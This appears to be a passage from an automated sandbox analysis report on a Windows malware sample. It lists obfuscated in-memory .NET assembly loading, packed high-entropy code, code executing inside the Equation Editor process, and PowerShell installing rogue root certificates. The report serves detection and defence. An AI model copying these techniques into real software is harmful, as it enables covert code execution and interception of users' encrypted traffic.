                  Source: 5.2.cdlpohayugo39567.exe.337ac68.4.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.3391e88.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.cs.Net Code: edtX4RO75J System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.bc0000.0.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.cs.Net Code: edtX4RO75J System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.cs.Net Code: edtX4RO75J System.Reflection.Assembly.Load(byte[])
                  Source: qHbynE8Vgwabsy3[1].exe.2.drStatic PE information: 0xA3006032 [Mon Aug 28 17:53:54 2056 UTC]
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E4456 push ecx; ret 2_2_005E4457
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D8F52 push eax; retf 2_2_005D8F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E444E push ecx; ret 2_2_005E444F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E6B4E push eax; ret 2_2_005E6B4F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E5A7A push ecx; ret 2_2_005E5A7B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E5672 push ecx; ret 2_2_005E5673
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E5A72 push ecx; ret 2_2_005E5A73
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E0F60 push eax; retn 005Dh2_2_005E0F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E54DB push ecx; ret 2_2_005E54DF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D01F4 push eax; retf 2_2_005D01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E54E3 push ecx; ret 2_2_005E54E7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E6B94 push eax; ret 2_2_005E6B97
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E6B8C push eax; ret 2_2_005E6B8F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E6B85 push eax; ret 2_2_005E6B87
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E54B7 push ecx; ret 2_2_005E54D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005E6BA4 push eax; ret 2_2_005E6C6F
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015D410 push edi; retf 0015h7_2_0015D411
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B9590 pushfd ; retn 0065h7_2_006B9591
                  Source: qHbynE8Vgwabsy3[1].exe.2.drStatic PE information: section name: .text entropy: 7.712698415610093
                  Source: cdlpohayugo39567.exe.2.drStatic PE information: section name: .text entropy: 7.712698415610093
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, DOkRkfKla7d2nWXn0d.csHigh entropy of concatenated method names: 'MX2WcoApX9', 'awIWU8e2WY', 'gVqWDNG3Ig', 'wrjWffJHyv', 'lyZW2X3M1C', 'EfHWEHZ9mx', 'tbSWAxdv9c', 'VEVWg1wARx', 'WvjW8XOxXW', 'MteWrEOUlL'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, AxPS6NU4xBdbum4iaG.csHigh entropy of concatenated method names: 'zkoMGWSEEl', 'LjTMwExyud', 'JPtMcQxZFg', 'bBJMUPX7Zd', 'MJvManMn6i', 'ggKMBYaHVB', 'oC9MO0LR2n', 'qrfMTRtiMO', 'ikaMpajYAS', 'bf0M3ZrkS9'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, nkQiD6cY1Ydm4FTjxb.csHigh entropy of concatenated method names: 'rxkIFvcT9X', 'jcOIVUxJu0', 'idVIY6Wpl2', 'DqdItLOrl5', 'RcWI0WnxxT', 'QGaIhjRhOe', 'Q1GIqrwc1I', 'kO8IvBONHe', 'h0wIRvPnHw', 'IcVI6vD7fO'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, oe3Km7DTgTKGBvcC3S.csHigh entropy of concatenated method names: 'Scex7itZ1a', 'krMxIUajhW', 'WAoxlBZMAN', 'hR9xo8OeH8', 'XCoxCvFwtf', 'Rayl0pjCrE', 'R0klhNWoX4', 'H3klqerTNv', 'aC1lv4xu3i', 'MpclR2U3dH'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, A1IKPavVkyxBAQZuM2.csHigh entropy of concatenated method names: 'QagTuhRpIP', 'iuiTIIybAn', 'TUgTMN0CRY', 'M2OTl9QPLY', 's9cTxakbyl', 'ghkTouCgWb', 'TiSTCesadA', 'obUTL5B18F', 'z60Te5t9Vx', 'JNgT9Rykqq'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, SXuFQVPsQB87HiA6dN1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nhi3FQlC0Z', 'Ihd3VS9Sql', 'eHg3Yg8xVv', 'ASW3tAjk1B', 'tsV30MdOAd', 'pye3hhVSqr', 'QSU3qmPvvb'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, d8ukINn1NQVCqVxQjL.csHigh entropy of concatenated method names: 'CE6l5ByBSK', 'jAmlN6imED', 'VpCMkyL7ec', 'nsCM2pZudQ', 'cU3MEHc6BB', 't2rMiVj1eh', 'RdnMAgDBYp', 'G7mMgwjQOv', 'xWSMbkHlmK', 'Sl3M8gdhbi'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, QRu7lvPHJ4Jfthlhhtx.csHigh entropy of concatenated method names: 'HecpjlAJjF', 'u6OpZKTxUO', 'gb4p4eHqsf', 'WaApGpTln0', 'PLDp5eduKx', 'IJYpwCKTES', 'oN4pNLJKGC', 'OhPpcljpH7', 'iyWpUm8VIA', 'k5Bpn12qEL'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pbVHJsCgecSXhXNesj.csHigh entropy of concatenated method names: 'XVns7YYd64', 'gk9suK4tW4', 'iqosI1Ahmq', 'B34sMTinFP', 'yGnslT6cJu', 'uOesxApms1', 'IQZsoqlBYD', 'ctasCPOlT0', 'arosLC0xTI', 'HHbseOLoCK'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, pE7g6sAN1if5hfhCiK.csHigh entropy of concatenated method names: 'bbgouYl8De', 'boxoMRc0sQ', 'wBvoxXtFSR', 'tpRx6PwpOm', 'VRLxzZd62H', 'xlJoHIhLv7', 'iBsoPSrTMV', 'kt1o10RlEx', 'YG1osMXSe3', 'FhSoXQq0hT'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, zcJu9C6JCFbkvaDEP2.csHigh entropy of concatenated method names: 'sBSpPRoUWj', 'v3vpsTJeju', 'FXTpX0rqbk', 'I8wpuhaIk3', 'gUnpI1eyv8', 'BCmplMBKpZ', 'b3lpxlFJUF', 'XsSTqtU29p', 'EvNTv4nvcU', 'rK3TR9xRR2'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, OxVbcfFYjHQZCnPtSc.csHigh entropy of concatenated method names: 'iuya8y4NAd', 'tCDaJsm5Li', 'AjbaFXqHYZ', 'a3CaV7bQXL', 'fnnafbsDW9', 'hMuak9Jqft', 'Bp0a2SMK5p', 'BL1aESxrOe', 'y9Rai4KiyZ', 'yqHaAJUd24'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, Vri5Y0X3Mvj8QeZPU3.csHigh entropy of concatenated method names: 'uLWPokQiD6', 'S1YPCdm4FT', 'C4xPeBdbum', 'ziaP9GX8uk', 'SxQPajLae3', 'Qm7PBTgTKG', 'rnQZCCh0wCxJpXER3h', 'Bi2bHbSHCynpkvrkHt', 'RyLPPat0KD', 'ciZPsa8Tdu'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, ORv0Vf1MXaCwqJj3AO.csHigh entropy of concatenated method names: 'M8a4S0T1A', 'QANG02vIj', 'DTNweXmE7', 'sanNBUiQK', 'sfjUKgcJ8', 'Bl3nr80sk', 'gQQRpnyf80he2jpcWd', 'Qoi4H3nYbSufOefLo2', 'EiETYQF9m', 'Om03b4vCA'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, ay0RdqRtsqlCqsp4Jt.csHigh entropy of concatenated method names: 'WeYTDG5KTM', 'J4QTf4nFNe', 'v4ATksmPf6', 'ki0T2UQ0rc', 'IWHTFiAXji', 'qnITEuCdgs', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, Eg2Qf0Mvy91CloiMEy.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mY41RK24rR', 'SpG16nV9i8', 'fEW1zpf1lZ', 'hqisHMPsD9', 'cqssPbXsVr', 'YJgs14GO0O', 'OkGss3OiBw', 'XVpyUEY0fKZHIVbygfx'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, IjiV83IwFQ2LWBkWZL.csHigh entropy of concatenated method names: 'Dispose', 'DllPRhQ8dw', 'cFu1fDNHD2', 'ye3vvGqc1V', 'p51P6IKPaV', 'IyxPzBAQZu', 'ProcessDialogKey', 'g2P1Hy0Rdq', 'Tsq1PlCqsp', 'zJt114cJu9'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, FLt5ZqbnRjplMM1mRV.csHigh entropy of concatenated method names: 'OEaoj4p6Ys', 'bUUoZTcS4d', 'INpo4PmK1Y', 'IZ8oGtybay', 'Yrko5E60kT', 'HEwow7kQS8', 'M3moNLIYwP', 'Fojoc4iTc1', 'gsVoUlVwBG', 'Ve7onoapbd'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, w7sfGjhxCOpKI2Hm2M.csHigh entropy of concatenated method names: 'yumOvgZufS', 'o3lO6rQ7uh', 'sbPTHq4fPy', 'vCATPuWb02', 'pIIOrDLKW0', 'snDOJ6U0gr', 'qFqOKk1IkK', 'zsGOF6oJlN', 'g7GOVsWk8B', 'dAoOYvQ1lb'
                  Source: 5.2.cdlpohayugo39567.exe.63c0000.7.raw.unpack, bgVh2BzAtL2EuQnmHR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pk3pWvnLxy', 'K4HpaiiR66', 'bnlpB8RSqh', 'PwSpOuKLfx', 'HsspThxL0x', 'i7KppA34Mc', 'dslp3ME4CY'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, DOkRkfKla7d2nWXn0d.csHigh entropy of concatenated method names: 'MX2WcoApX9', 'awIWU8e2WY', 'gVqWDNG3Ig', 'wrjWffJHyv', 'lyZW2X3M1C', 'EfHWEHZ9mx', 'tbSWAxdv9c', 'VEVWg1wARx', 'WvjW8XOxXW', 'MteWrEOUlL'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, AxPS6NU4xBdbum4iaG.csHigh entropy of concatenated method names: 'zkoMGWSEEl', 'LjTMwExyud', 'JPtMcQxZFg', 'bBJMUPX7Zd', 'MJvManMn6i', 'ggKMBYaHVB', 'oC9MO0LR2n', 'qrfMTRtiMO', 'ikaMpajYAS', 'bf0M3ZrkS9'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, nkQiD6cY1Ydm4FTjxb.csHigh entropy of concatenated method names: 'rxkIFvcT9X', 'jcOIVUxJu0', 'idVIY6Wpl2', 'DqdItLOrl5', 'RcWI0WnxxT', 'QGaIhjRhOe', 'Q1GIqrwc1I', 'kO8IvBONHe', 'h0wIRvPnHw', 'IcVI6vD7fO'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, oe3Km7DTgTKGBvcC3S.csHigh entropy of concatenated method names: 'Scex7itZ1a', 'krMxIUajhW', 'WAoxlBZMAN', 'hR9xo8OeH8', 'XCoxCvFwtf', 'Rayl0pjCrE', 'R0klhNWoX4', 'H3klqerTNv', 'aC1lv4xu3i', 'MpclR2U3dH'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, A1IKPavVkyxBAQZuM2.csHigh entropy of concatenated method names: 'QagTuhRpIP', 'iuiTIIybAn', 'TUgTMN0CRY', 'M2OTl9QPLY', 's9cTxakbyl', 'ghkTouCgWb', 'TiSTCesadA', 'obUTL5B18F', 'z60Te5t9Vx', 'JNgT9Rykqq'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, SXuFQVPsQB87HiA6dN1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nhi3FQlC0Z', 'Ihd3VS9Sql', 'eHg3Yg8xVv', 'ASW3tAjk1B', 'tsV30MdOAd', 'pye3hhVSqr', 'QSU3qmPvvb'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, d8ukINn1NQVCqVxQjL.csHigh entropy of concatenated method names: 'CE6l5ByBSK', 'jAmlN6imED', 'VpCMkyL7ec', 'nsCM2pZudQ', 'cU3MEHc6BB', 't2rMiVj1eh', 'RdnMAgDBYp', 'G7mMgwjQOv', 'xWSMbkHlmK', 'Sl3M8gdhbi'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, QRu7lvPHJ4Jfthlhhtx.csHigh entropy of concatenated method names: 'HecpjlAJjF', 'u6OpZKTxUO', 'gb4p4eHqsf', 'WaApGpTln0', 'PLDp5eduKx', 'IJYpwCKTES', 'oN4pNLJKGC', 'OhPpcljpH7', 'iyWpUm8VIA', 'k5Bpn12qEL'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pbVHJsCgecSXhXNesj.csHigh entropy of concatenated method names: 'XVns7YYd64', 'gk9suK4tW4', 'iqosI1Ahmq', 'B34sMTinFP', 'yGnslT6cJu', 'uOesxApms1', 'IQZsoqlBYD', 'ctasCPOlT0', 'arosLC0xTI', 'HHbseOLoCK'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, pE7g6sAN1if5hfhCiK.csHigh entropy of concatenated method names: 'bbgouYl8De', 'boxoMRc0sQ', 'wBvoxXtFSR', 'tpRx6PwpOm', 'VRLxzZd62H', 'xlJoHIhLv7', 'iBsoPSrTMV', 'kt1o10RlEx', 'YG1osMXSe3', 'FhSoXQq0hT'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, zcJu9C6JCFbkvaDEP2.csHigh entropy of concatenated method names: 'sBSpPRoUWj', 'v3vpsTJeju', 'FXTpX0rqbk', 'I8wpuhaIk3', 'gUnpI1eyv8', 'BCmplMBKpZ', 'b3lpxlFJUF', 'XsSTqtU29p', 'EvNTv4nvcU', 'rK3TR9xRR2'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, OxVbcfFYjHQZCnPtSc.csHigh entropy of concatenated method names: 'iuya8y4NAd', 'tCDaJsm5Li', 'AjbaFXqHYZ', 'a3CaV7bQXL', 'fnnafbsDW9', 'hMuak9Jqft', 'Bp0a2SMK5p', 'BL1aESxrOe', 'y9Rai4KiyZ', 'yqHaAJUd24'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, Vri5Y0X3Mvj8QeZPU3.csHigh entropy of concatenated method names: 'uLWPokQiD6', 'S1YPCdm4FT', 'C4xPeBdbum', 'ziaP9GX8uk', 'SxQPajLae3', 'Qm7PBTgTKG', 'rnQZCCh0wCxJpXER3h', 'Bi2bHbSHCynpkvrkHt', 'RyLPPat0KD', 'ciZPsa8Tdu'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, ORv0Vf1MXaCwqJj3AO.csHigh entropy of concatenated method names: 'M8a4S0T1A', 'QANG02vIj', 'DTNweXmE7', 'sanNBUiQK', 'sfjUKgcJ8', 'Bl3nr80sk', 'gQQRpnyf80he2jpcWd', 'Qoi4H3nYbSufOefLo2', 'EiETYQF9m', 'Om03b4vCA'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, ay0RdqRtsqlCqsp4Jt.csHigh entropy of concatenated method names: 'WeYTDG5KTM', 'J4QTf4nFNe', 'v4ATksmPf6', 'ki0T2UQ0rc', 'IWHTFiAXji', 'qnITEuCdgs', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, Eg2Qf0Mvy91CloiMEy.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mY41RK24rR', 'SpG16nV9i8', 'fEW1zpf1lZ', 'hqisHMPsD9', 'cqssPbXsVr', 'YJgs14GO0O', 'OkGss3OiBw', 'XVpyUEY0fKZHIVbygfx'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, IjiV83IwFQ2LWBkWZL.csHigh entropy of concatenated method names: 'Dispose', 'DllPRhQ8dw', 'cFu1fDNHD2', 'ye3vvGqc1V', 'p51P6IKPaV', 'IyxPzBAQZu', 'ProcessDialogKey', 'g2P1Hy0Rdq', 'Tsq1PlCqsp', 'zJt114cJu9'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, FLt5ZqbnRjplMM1mRV.csHigh entropy of concatenated method names: 'OEaoj4p6Ys', 'bUUoZTcS4d', 'INpo4PmK1Y', 'IZ8oGtybay', 'Yrko5E60kT', 'HEwow7kQS8', 'M3moNLIYwP', 'Fojoc4iTc1', 'gsVoUlVwBG', 'Ve7onoapbd'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, w7sfGjhxCOpKI2Hm2M.csHigh entropy of concatenated method names: 'yumOvgZufS', 'o3lO6rQ7uh', 'sbPTHq4fPy', 'vCATPuWb02', 'pIIOrDLKW0', 'snDOJ6U0gr', 'qFqOKk1IkK', 'zsGOF6oJlN', 'g7GOVsWk8B', 'dAoOYvQ1lb'
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, bgVh2BzAtL2EuQnmHR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pk3pWvnLxy', 'K4HpaiiR66', 'bnlpB8RSqh', 'PwSpOuKLfx', 'HsspThxL0x', 'i7KppA34Mc', 'dslp3ME4CY'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, DOkRkfKla7d2nWXn0d.csHigh entropy of concatenated method names: 'MX2WcoApX9', 'awIWU8e2WY', 'gVqWDNG3Ig', 'wrjWffJHyv', 'lyZW2X3M1C', 'EfHWEHZ9mx', 'tbSWAxdv9c', 'VEVWg1wARx', 'WvjW8XOxXW', 'MteWrEOUlL'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, AxPS6NU4xBdbum4iaG.csHigh entropy of concatenated method names: 'zkoMGWSEEl', 'LjTMwExyud', 'JPtMcQxZFg', 'bBJMUPX7Zd', 'MJvManMn6i', 'ggKMBYaHVB', 'oC9MO0LR2n', 'qrfMTRtiMO', 'ikaMpajYAS', 'bf0M3ZrkS9'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, nkQiD6cY1Ydm4FTjxb.csHigh entropy of concatenated method names: 'rxkIFvcT9X', 'jcOIVUxJu0', 'idVIY6Wpl2', 'DqdItLOrl5', 'RcWI0WnxxT', 'QGaIhjRhOe', 'Q1GIqrwc1I', 'kO8IvBONHe', 'h0wIRvPnHw', 'IcVI6vD7fO'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, oe3Km7DTgTKGBvcC3S.csHigh entropy of concatenated method names: 'Scex7itZ1a', 'krMxIUajhW', 'WAoxlBZMAN', 'hR9xo8OeH8', 'XCoxCvFwtf', 'Rayl0pjCrE', 'R0klhNWoX4', 'H3klqerTNv', 'aC1lv4xu3i', 'MpclR2U3dH'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, A1IKPavVkyxBAQZuM2.csHigh entropy of concatenated method names: 'QagTuhRpIP', 'iuiTIIybAn', 'TUgTMN0CRY', 'M2OTl9QPLY', 's9cTxakbyl', 'ghkTouCgWb', 'TiSTCesadA', 'obUTL5B18F', 'z60Te5t9Vx', 'JNgT9Rykqq'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, SXuFQVPsQB87HiA6dN1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nhi3FQlC0Z', 'Ihd3VS9Sql', 'eHg3Yg8xVv', 'ASW3tAjk1B', 'tsV30MdOAd', 'pye3hhVSqr', 'QSU3qmPvvb'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, d8ukINn1NQVCqVxQjL.csHigh entropy of concatenated method names: 'CE6l5ByBSK', 'jAmlN6imED', 'VpCMkyL7ec', 'nsCM2pZudQ', 'cU3MEHc6BB', 't2rMiVj1eh', 'RdnMAgDBYp', 'G7mMgwjQOv', 'xWSMbkHlmK', 'Sl3M8gdhbi'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, QRu7lvPHJ4Jfthlhhtx.csHigh entropy of concatenated method names: 'HecpjlAJjF', 'u6OpZKTxUO', 'gb4p4eHqsf', 'WaApGpTln0', 'PLDp5eduKx', 'IJYpwCKTES', 'oN4pNLJKGC', 'OhPpcljpH7', 'iyWpUm8VIA', 'k5Bpn12qEL'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pbVHJsCgecSXhXNesj.csHigh entropy of concatenated method names: 'XVns7YYd64', 'gk9suK4tW4', 'iqosI1Ahmq', 'B34sMTinFP', 'yGnslT6cJu', 'uOesxApms1', 'IQZsoqlBYD', 'ctasCPOlT0', 'arosLC0xTI', 'HHbseOLoCK'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, pE7g6sAN1if5hfhCiK.csHigh entropy of concatenated method names: 'bbgouYl8De', 'boxoMRc0sQ', 'wBvoxXtFSR', 'tpRx6PwpOm', 'VRLxzZd62H', 'xlJoHIhLv7', 'iBsoPSrTMV', 'kt1o10RlEx', 'YG1osMXSe3', 'FhSoXQq0hT'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, zcJu9C6JCFbkvaDEP2.csHigh entropy of concatenated method names: 'sBSpPRoUWj', 'v3vpsTJeju', 'FXTpX0rqbk', 'I8wpuhaIk3', 'gUnpI1eyv8', 'BCmplMBKpZ', 'b3lpxlFJUF', 'XsSTqtU29p', 'EvNTv4nvcU', 'rK3TR9xRR2'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, OxVbcfFYjHQZCnPtSc.csHigh entropy of concatenated method names: 'iuya8y4NAd', 'tCDaJsm5Li', 'AjbaFXqHYZ', 'a3CaV7bQXL', 'fnnafbsDW9', 'hMuak9Jqft', 'Bp0a2SMK5p', 'BL1aESxrOe', 'y9Rai4KiyZ', 'yqHaAJUd24'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, Vri5Y0X3Mvj8QeZPU3.csHigh entropy of concatenated method names: 'uLWPokQiD6', 'S1YPCdm4FT', 'C4xPeBdbum', 'ziaP9GX8uk', 'SxQPajLae3', 'Qm7PBTgTKG', 'rnQZCCh0wCxJpXER3h', 'Bi2bHbSHCynpkvrkHt', 'RyLPPat0KD', 'ciZPsa8Tdu'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, ORv0Vf1MXaCwqJj3AO.csHigh entropy of concatenated method names: 'M8a4S0T1A', 'QANG02vIj', 'DTNweXmE7', 'sanNBUiQK', 'sfjUKgcJ8', 'Bl3nr80sk', 'gQQRpnyf80he2jpcWd', 'Qoi4H3nYbSufOefLo2', 'EiETYQF9m', 'Om03b4vCA'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, ay0RdqRtsqlCqsp4Jt.csHigh entropy of concatenated method names: 'WeYTDG5KTM', 'J4QTf4nFNe', 'v4ATksmPf6', 'ki0T2UQ0rc', 'IWHTFiAXji', 'qnITEuCdgs', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, Eg2Qf0Mvy91CloiMEy.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mY41RK24rR', 'SpG16nV9i8', 'fEW1zpf1lZ', 'hqisHMPsD9', 'cqssPbXsVr', 'YJgs14GO0O', 'OkGss3OiBw', 'XVpyUEY0fKZHIVbygfx'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, IjiV83IwFQ2LWBkWZL.csHigh entropy of concatenated method names: 'Dispose', 'DllPRhQ8dw', 'cFu1fDNHD2', 'ye3vvGqc1V', 'p51P6IKPaV', 'IyxPzBAQZu', 'ProcessDialogKey', 'g2P1Hy0Rdq', 'Tsq1PlCqsp', 'zJt114cJu9'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, FLt5ZqbnRjplMM1mRV.csHigh entropy of concatenated method names: 'OEaoj4p6Ys', 'bUUoZTcS4d', 'INpo4PmK1Y', 'IZ8oGtybay', 'Yrko5E60kT', 'HEwow7kQS8', 'M3moNLIYwP', 'Fojoc4iTc1', 'gsVoUlVwBG', 'Ve7onoapbd'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, w7sfGjhxCOpKI2Hm2M.csHigh entropy of concatenated method names: 'yumOvgZufS', 'o3lO6rQ7uh', 'sbPTHq4fPy', 'vCATPuWb02', 'pIIOrDLKW0', 'snDOJ6U0gr', 'qFqOKk1IkK', 'zsGOF6oJlN', 'g7GOVsWk8B', 'dAoOYvQ1lb'
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, bgVh2BzAtL2EuQnmHR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pk3pWvnLxy', 'K4HpaiiR66', 'bnlpB8RSqh', 'PwSpOuKLfx', 'HsspThxL0x', 'i7KppA34Mc', 'dslp3ME4CY'

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
